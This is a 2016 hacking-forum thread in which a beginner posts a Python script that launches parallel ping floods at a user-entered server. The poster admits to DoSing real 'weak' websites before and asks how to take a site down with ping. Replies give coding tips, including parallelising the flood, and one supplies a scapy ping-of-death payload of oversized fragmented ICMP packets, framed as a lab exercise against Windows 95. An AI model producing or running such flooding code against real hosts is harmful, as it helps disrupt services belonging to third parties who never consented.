Hacking and Security => Beginner's Corner => Topic started by: Coto on January 17, 2016, 05:08:02 PM
I had recently heard about "Ping of Death". It was known to act like a DDoS tool, by Pinging and sending threads to the victim Server.
I made something like that in Python:
import time
import requests
import os
server = raw_input("Server to perform the DDoS Attack on [IP/URL]: ")
connections = input("Connections [1-100]: ")
downtime = float(raw_input("Downtime [in seconds]: "))
if '.' in server:
for x in range(0, connections):
os.system("gnome-terminal -e 'ping -f %s'" % str(server))
print(server+ "is not a valid IP/URL.")
print(" ")
print("\033[1;32;40mAttack has been successfully completed!")
print(" ")
print("\033[1;31;40mServer's Downtime:"),
print("\033[1;35;40m%s") % (downtime)
print(" ")
print("\033[1;36;40mSaving Output..."),
f = open('Attack_History.txt','a')
f = open('Attack_History.txt','w')
f.write('Server: '+server+'\n')
f.write('Connections: %s''\n' % str(connections))
f.write('Downtime: %s Seconds''\n' % str(downtime))
os.system("pkill terminal")
But it doesn't seem to work, even on very "weak" Websites, that I've tried DoSing with other ways and have worked. I opened up EtherApe and noticed that all the attacks were reflected on me. Just like a distributed reflective denial of service. Why does this happen? And is it possible to take down a site by using Ping?
What you are doing is not ping of death (https://en.wikipedia.org/wiki/Ping_of_death), but just regular ping... I am not really sure how you are trying to achieve buffer overflow (or whatever you are after) with this. Please let me know if I'm missing something.
Also a couple of notes on your script:
- Since it is a python script, first line should probably be '#!/usr/bin/env python', not '#!/bin/sh' (your default shell probably doesn't speak python =)
- It is usually considered better to enable setting options via parameters, than asking for them 1 by 1 each time a script is run
- Not sure what you are trying to achieve with connections, but your for loop will execute one 'connection' at a time. If you want to have them in parallel, see multiprocessing (https://docs.python.org/2/library/multiprocessing.html)
EDIT: Also, it would probably be wise to first find something that you can exploit using ping of death, put it on your network and develop / test it there until you get it right.
HAHAHAHAHAHA ping of death, the 90's called, they want it back.
Plz stop making a fool of yourself.
Disclaimer: This attack is too deprecated it might have been a prime in my grandfather's middle age crisis days.
For the sake of learning purposes, lets pretend we are still in the 90's and reconstruct this.
For testing purposes, setup two machines in a private network, take it to the VM to save yourself from the huddles of networking. I leave the VM networking as homework for you.
I would advise one machine to have you favorite OS to ping from and the other having something like Windows 95 (https://evilzone.org/operating-system/windows-95).
I don't know if that ISO is patched but try it out anyways.
Your default ping utility on your system might not allow you to enter an arbitrary amount of bytes to send so i advise you go the scapy way since we are doing python.
NOTICE: I am typing this from my browser, fuck you if it does go through
import argparse
from scapy.all import send, fragment, IP, ICMP
#implement argparse logic to get URL but most preferably IP
#if IP, validate that is IP with regex or w/e logic you think of
#if URL, i suggest get its or one of its IP Address
ip_address = #validated IP from above
#scappy magic
send(fragment(IP(dst=ip_address) / ICMP() / ("X"*60000)))
I suggest you play around with those values, remember the multithreading advice from prior and you most probably will not find a vulnerable machine in this time and age unless you set it up.
If the attack doesn't crash the machine or restart it, get MSDOS.
I had recently heard about "Ping of Death". It was known to act like a DDoS tool, by Pinging and sending threads to the victim Server.
But it doesn't seem to work, even on very "weak" Websites, that I've tried DoSing with other ways and have worked. I opened up EtherApe and noticed that all the attacks were reflected on me. Just like a distributed reflective denial of service. Why does this happen? And is it possible to take down a site by using Ping?
Try against OS: NT, Win3.11 with trumpet Winsocks and win95.
Oh, wait... were are in 2016 ... those attacks worked in 1997 :P, too late!